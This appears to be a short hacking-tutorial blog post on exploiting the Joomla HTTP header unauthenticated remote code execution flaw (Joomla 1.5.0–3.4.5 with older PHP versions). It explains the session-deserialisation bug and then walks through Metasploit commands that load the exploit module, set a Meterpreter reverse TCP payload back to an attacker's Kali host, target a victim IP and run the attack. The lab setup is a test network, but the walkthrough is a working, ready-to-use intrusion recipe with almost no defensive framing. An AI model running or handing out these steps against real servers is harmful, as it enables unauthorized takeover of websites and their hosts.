Exploit Joomla Using HTTP Header Unauthenticated Remote Code Execution

Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it’s possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.

 Exploit Targets

Joomla 1.5.0 – 3.4.5

Requirement

Attacker: kali Linux

Victim PC: Joomla 3.4.5

Open Kali terminal type msfconsole

Now type use exploit/multi/http/joomla_http­_header_rce

msf exploit (joomla_http­_header_rce)>set payload php/meterpreter/reverse_tcp

msf exploit (joomla_http­_header_rce)>set lhost 192.168.0.106 (IP address of kali Linux)

msf exploit (joomla_http­_header_rce)>set targeturi /joomla/

msf exploit (joomla_http­_header_rce)>set rhost 192.168.0.104 (IP of Remote Host)

msf exploit (joomla_http­_header_rce)>set rport 80

msf exploit (joomla_http­_header_rce)>exploit        

Leave a Reply

Your email address will not be published. Required fields are marked *